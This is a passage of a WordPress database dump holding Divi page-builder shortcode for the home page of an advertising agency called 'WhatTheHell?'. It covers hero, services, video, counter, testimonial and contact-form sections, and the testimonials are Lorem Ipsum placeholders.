text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 16:38:36','2020-08-07 16:38:36','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(497,1,'2020-08-07 16:39:36','2020-08-07 16:39:36','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"creative advertising agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" 